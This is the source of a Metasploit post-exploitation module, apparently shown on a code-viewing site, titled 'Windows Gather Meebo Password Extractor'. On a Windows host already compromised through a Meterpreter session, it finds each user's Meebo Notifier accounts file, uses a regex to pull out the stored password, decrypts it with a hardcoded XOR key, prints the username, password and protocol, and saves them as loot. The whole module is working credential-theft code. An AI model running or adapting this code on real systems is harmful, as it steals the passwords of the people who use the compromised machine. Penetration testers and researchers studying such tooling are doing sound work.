Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/gather/credentials/meebo.rb
Views: 11704
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Auxiliary::Report7include Msf::Post::Windows::UserProfiles89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Windows Gather Meebo Password Extractor',14'Description' => %q{15This module extracts login account password stored by16Meebo Notifier, a desktop version of Meebo's Online Messenger.17},18'License' => MSF_LICENSE,19'Author' => [20'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',21'Unknown', # SecurityXploded Team, www.SecurityXploded.com22],23'Platform' => [ 'win' ],24'SessionTypes' => [ 'meterpreter' ],25'Compat' => {26'Meterpreter' => {27'Commands' => %w[28core_channel_eof29core_channel_open30core_channel_read31core_channel_write32stdapi_fs_stat33]34}35}36)37)38end3940def run41grab_user_profiles.each do |user|42accounts = user['AppData'] + '\\Meebo\\MeeboAccounts.txt'43next if user['AppData'].nil?44next if accounts.empty?4546stat = begin47session.fs.file.stat(accounts)48rescue StandardError49nil50end51next if stat.nil?5253parse_txt(accounts)54end55end5657def parse_txt(file)58creds = Rex::Text::Table.new(59'Header' => 'Meebo Instant Messenger Credentials',60'Indent' => 1,61'Columns' =>62[63'User',64'Password',65'Protocol'66]67)6869config = client.fs.file.new(file, 'r')70parse = config.read7172if (parse =~ /"password.{5}(.*)",\s*"protocol.{4}(\d),\s*"username.{5}(.*)"/)73epass = ::Regexp.last_match(1)74protocol = ::Regexp.last_match(2).to_i75username = ::Regexp.last_match(3)76else77print_error('Regex failed...')78return79end8081protocol = 'Meebo' if protocol == 082protocol = 'AIM' if protocol == 183protocol = 'Yahoo IM' if protocol == 284protocol = 'Windows Live' if protocol == 385protocol = 'Google Talk' if protocol == 486protocol = 'ICQ' if protocol == 587protocol = 'Jabber' if protocol == 688protocol = 'Myspace IM' if protocol == 78990passwd = decrypt(epass)91print_good("*** Protocol: #{protocol} User: #{username} Password: #{passwd} ***")92creds << [username, passwd, protocol]93config.close9495if passwd.nil? || username.nil?96print_status('Meebo credentials have not been found')97else98print_status('Storing data...')99path = store_loot(100'meebo.user.creds',101'text/csv',102session,103creds.to_csv,104'meebo_user_creds.csv',105'Meebo Notifier User Credentials'106)107print_good("Meebo Notifier user credentials saved in: #{path}")108end109rescue ::Exception => e110print_error("An error has occurred: #{e}")111end112113def decrypt(epass)114magicarr = [1154, 240, 122, 53, 65, 19, 163, 124, 109,11673, 187, 3, 34, 93, 15, 138, 11, 153, 148, 147, 146,117222, 129, 160, 199, 104, 240, 43, 89, 105, 204, 236,118253, 168, 96, 48, 158, 143, 173, 60, 215, 104, 112,119149, 15, 114, 107, 4, 92, 149, 48, 177, 42, 133, 124,120152, 63, 137, 2, 40, 84, 131121]122123plaintext = [epass].pack('H*').unpack('C*')124125for i in 0..plaintext.length - 1 do126plaintext[i] ^= magicarr[i]127end128129return plaintext.pack('C*')130end131end132133134